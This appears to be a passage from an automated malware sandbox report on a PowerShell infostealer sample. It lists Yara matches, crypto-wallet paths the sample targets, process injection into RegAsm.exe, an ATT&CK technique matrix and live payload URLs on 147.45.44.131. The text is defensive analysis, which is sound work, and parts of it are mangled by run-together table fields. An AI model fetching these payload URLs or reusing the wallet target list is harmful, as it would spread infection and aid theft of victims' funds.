                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Lowering of HIPS / PFW / Operating System Security Settings

                  barindex
                  Source: Yara matchFile source: 5.2.powershell.exe.29dec589c5a.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.powershell.exe.29debe9c1b2.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.powershell.exe.29dec168498.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.powershell.exe.29dec168498.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.powershell.exe.29dec28c222.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2322702408.0000029DEC168000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4016, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4508, type: MEMORYSTR
                  Source: powershell.exe, 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2322702408.0000029DEC168000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: MSASCui.exe
                  Source: powershell.exe, 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2322702408.0000029DEC168000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: procexp.exe
                  Source: RegAsm.exe, 00000009.00000002.4597271061.0000000005630000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: powershell.exe, 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2322702408.0000029DEC168000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 5.2.powershell.exe.29dec589c5a.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.powershell.exe.29debe9c1b2.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.powershell.exe.29dec168498.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.powershell.exe.29dec168498.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.powershell.exe.29dec28c222.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2322702408.0000029DEC168000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4016, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4508, type: MEMORYSTR
                  Source: Yara matchFile source: 00000009.00000002.4582340011.0000000003204000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 9.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.powershell.exe.29dec168498.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.powershell.exe.29dec168498.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.powershell.exe.29dec28c222.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2322702408.0000029DEC168000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4016, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4508, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4016, type: MEMORYSTR
                  Source: powershell.exe, 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum#\Electrum\wallets
                  Source: powershell.exe, 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \bytecoinJaxxk\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
                  Source: powershell.exe, 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus+\Exodus\exodus.wallet
                  Source: powershell.exe, 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum%\Ethereum\keystore
                  Source: powershell.exe, 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: exodus
                  Source: powershell.exe, 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum%\Ethereum\keystore
                  Source: powershell.exe, 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Coinomi1\Coinomi\Coinomi\wallets
                  Source: powershell.exe, 00000000.00000002.2194708538.00007FFD34740000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
                  Source: Yara matchFile source: 5.2.powershell.exe.29dec589c5a.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.powershell.exe.29debe9c1b2.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.powershell.exe.29dec168498.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.powershell.exe.29dec168498.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.powershell.exe.29dec28c222.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2322702408.0000029DEC168000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4016, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4508, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 5.2.powershell.exe.29dec589c5a.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.powershell.exe.29debe9c1b2.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.powershell.exe.29dec168498.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.powershell.exe.29dec168498.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.powershell.exe.29dec28c222.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2322702408.0000029DEC168000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4016, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4508, type: MEMORYSTR
                  Source: Yara matchFile source: 00000009.00000002.4582340011.0000000003204000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 9.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.powershell.exe.29dec168498.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.powershell.exe.29dec168498.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.powershell.exe.29dec28c222.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2322702408.0000029DEC168000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4016, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4508, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4016, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information1
                  Scripting
                  Valid Accounts131
                  Windows Management Instrumentation
                  1
                  Scripting
                  1
                  DLL Side-Loading
                  1
                  Disable or Modify Tools
                  OS Credential Dumping1
                  File and Directory Discovery
                  Remote Services1
                  Archive Collected Data
                  11
                  Ingress Tool Transfer
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Native API
                  1
                  DLL Side-Loading
                  312
                  Process Injection
                  111
                  Obfuscated Files or Information
                  LSASS Memory24
                  System Information Discovery
                  Remote Desktop Protocol1
                  Data from Local System
                  1
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Exploitation for Client Execution
                  1
                  Scheduled Task/Job
                  1
                  Scheduled Task/Job
                  1
                  Software Packing
                  Security Account Manager241
                  Security Software Discovery
                  SMB/Windows Admin SharesData from Network Shared Drive1
                  Non-Standard Port
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts1
                  Scheduled Task/Job
                  2
                  Registry Run Keys / Startup Folder
                  2
                  Registry Run Keys / Startup Folder
                  1
                  DLL Side-Loading
                  NTDS2
                  Process Discovery
                  Distributed Component Object ModelInput Capture2
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud Accounts2
                  PowerShell
                  Network Logon ScriptNetwork Logon Script1
                  Masquerading
                  LSA Secrets151
                  Virtualization/Sandbox Evasion
                  SSHKeylogging22
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts151
                  Virtualization/Sandbox Evasion
                  Cached Domain Credentials1
                  Application Window Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items312
                  Process Injection
                  DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1585139 Sample: sfqbr.ps1 Startdate: 07/01/2025 Architecture: WINDOWS Score: 100 47 bg.microsoft.map.fastly.net 2->47 49 18.31.95.13.in-addr.arpa 2->49 55 Suricata IDS alerts for network traffic 2->55 57 Malicious sample detected (through community Yara rule) 2->57 59 Antivirus detection for dropped file 2->59 61 18 other signatures 2->61 10 powershell.exe 14 21 2->10         started        signatures3 process4 dnsIp5 51 147.45.44.131, 49709, 49710, 49712 FREE-NET-ASFREEnetEU Russian Federation 10->51 41 C:\Windows\Temp\Pack.bat, Unicode 10->41 dropped 43 C:\Users\user\AppData\Roaming\...\App.url, MS 10->43 dropped 73 Found many strings related to Crypto-Wallets (likely being stolen) 10->73 75 Suspicious execution chain found 10->75 77 Found suspicious powershell code related to unpacking or dynamic code loading 10->77 79 Compiles code for process injection (via .Net compiler) 10->79 15 cmd.exe 1 10->15         started        18 conhost.exe 10->18         started        file6 signatures7 process8 signatures9 81 Suspicious powershell command line found 15->81 83 Bypasses PowerShell execution policy 15->83 20 powershell.exe 35 15->20         started        24 cmd.exe 1 15->24         started        process10 file11 37 C:\Users\user\AppData\...\nfy3200k.cmdline, Unicode 20->37 dropped 39 C:\Users\user\AppData\Local\...\nfy3200k.0.cs, Unicode 20->39 dropped 63 Found many strings related to Crypto-Wallets (likely being stolen) 20->63 65 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 20->65 67 Writes to foreign memory regions 20->67 69 Injects a PE file into a foreign processes 20->69 26 RegAsm.exe 1 3 20->26         started        30 csc.exe 3 20->30         started        33 curl.exe 1 24->33         started        signatures12 process13 dnsIp14 53 94.130.22.61, 4449, 49742 HETZNER-ASDE Germany 26->53 71 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 26->71 45 C:\Users\user\AppData\Local\...\nfy3200k.dll, PE32 30->45 dropped 35 cvtres.exe 1 30->35         started        file15 signatures16 process17

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  sfqbr.ps13%VirustotalBrowse
                  sfqbr.ps13%ReversingLabs
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\nfy3200k\nfy3200k.dll100%AviraHEUR/AGEN.1300034
                  C:\Users\user\AppData\Local\Temp\nfy3200k\nfy3200k.dll100%Joe Sandbox ML
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  http://147.45.44.131/infopage/utres.exe0%Avira URL Cloudsafe
                  http://147.45.44.131/infopage/grwsx.exe0%Avira URL Cloudsafe
                  http://147.45.H0%Avira URL Cloudsafe
                  http://147.45.44.131/infopage/sfxqr.ps1S0%Avira URL Cloudsafe
                  http://147.45.Hr0%Avira URL Cloudsafe
                  http://147.45.44.131/infopage/wertxcp.bat0%Avira URL Cloudsafe
                  http://147.45.44.131/infopage/sfxqr.ps1A0%Avira URL Cloudsafe
                  http://147.45.44.131/infopage/sfxqr.ps1USERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUS0%Avira URL Cloudsafe
                  http://147.45.44.131/infopage/sfxqr.ps1USERDOMAIN=user-PCUSERD0%Avira URL Cloudsafe
                  http://147.45.44.131/infopage/sfxqr.ps1.0%Avira URL Cloudsafe
                  http://147.45.44.131/infopage/sfxqr.ps10%Avira URL Cloudsafe
                  http://www.microsoft.pkio0%Avira URL Cloudsafe
                  http://147.45.44.131/infopage/sfxqr.ps1userdo0%Avira URL Cloudsafe
                  http://147.45.440%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  bg.microsoft.map.fastly.net
                  199.232.214.172
                  truefalse
                    high
                    18.31.95.13.in-addr.arpa
                    unknown
                    unknownfalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      http://147.45.44.131/infopage/grwsx.exefalse
                      • Avira URL Cloud: safe
                      unknown
                      http://147.45.44.131/infopage/wertxcp.batfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://147.45.44.131/infopage/sfxqr.ps1false
                      • Avira URL Cloud: safe
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://147.45.44.131/infopage/utres.exepowershell.exe, 00000005.00000002.2255186878.0000029DDDAB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2255186878.0000029DDC076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2351543460.0000029DF4120000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000007.00000003.2191430981.000001EEBBEE2000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000007.00000003.2192728985.000001EEBD7AB000.00000004.00001000.00020000.00000000.sdmp, csc.exe, 00000007.00000003.2191275065.000001EEBBEF3000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000007.00000003.2191515346.000001EEBBEF3000.00000004.00000020.00020000.00000000.sdmp, nfy3200k.dll.7.dr, nfy3200k.0.cs.5.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.2177874216.0000027EBA27F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2177874216.0000027EBA13C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2322702408.0000029DEBBD9000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.2255186878.0000029DDBE0F000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://147.45.Hpowershell.exe, 00000005.00000002.2255186878.0000029DDDA9A000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.2255186878.0000029DDBE0F000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://go.micropowershell.exe, 00000000.00000002.2146890283.0000027EAAD02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2255186878.0000029DDCAE4000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://147.45.44.131/infopage/sfxqr.ps1Scsc.exe, 00000007.00000002.2193370475.000001EEBBE68000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://discordapp.com/api/v6/users/RegAsm.exe, 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                high
                                https://contoso.com/Licensepowershell.exe, 00000005.00000002.2322702408.0000029DEBBD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://contoso.com/Iconpowershell.exe, 00000005.00000002.2322702408.0000029DEBBD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://147.45.Hrpowershell.exe, 00000005.00000002.2255186878.0000029DDDAB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.microsoft.powershell.exe, 00000005.00000002.2351616241.0000029DF4177000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://147.45.44.131/infopage/sfxqr.ps1USERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSRegAsm.exe, 00000009.00000002.4602307651.0000000006480000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.2255186878.0000029DDBE0F000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://urn.to/r/sds_seeaCouldpowershell.exe, 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2322702408.0000029DEC168000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                          high
                                          http://james.newtonking.com/projects/jsonRegAsm.exe, 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                            high
                                            http://www.newtonsoft.com/jsonschemapowershell.exe, 00000005.00000002.2255186878.0000029DDC076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2322702408.0000029DEC168000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                              high
                                              http://147.45.44.131powershell.exe, 00000000.00000002.2146890283.0000027EAB975000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2255186878.0000029DDDA12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2255186878.0000029DDBFA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://147.45.44.131/infopage/sfxqr.ps1Acvtres.exe, 00000008.00000002.2191070716.00000226E6ED9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://stackoverflow.com/q/14436606/23354cItpowershell.exe, 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2322702408.0000029DEC168000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                  high
                                                  http://ipinfo.io/ippowershell.exe, 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2322702408.0000029DEC168000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                    high
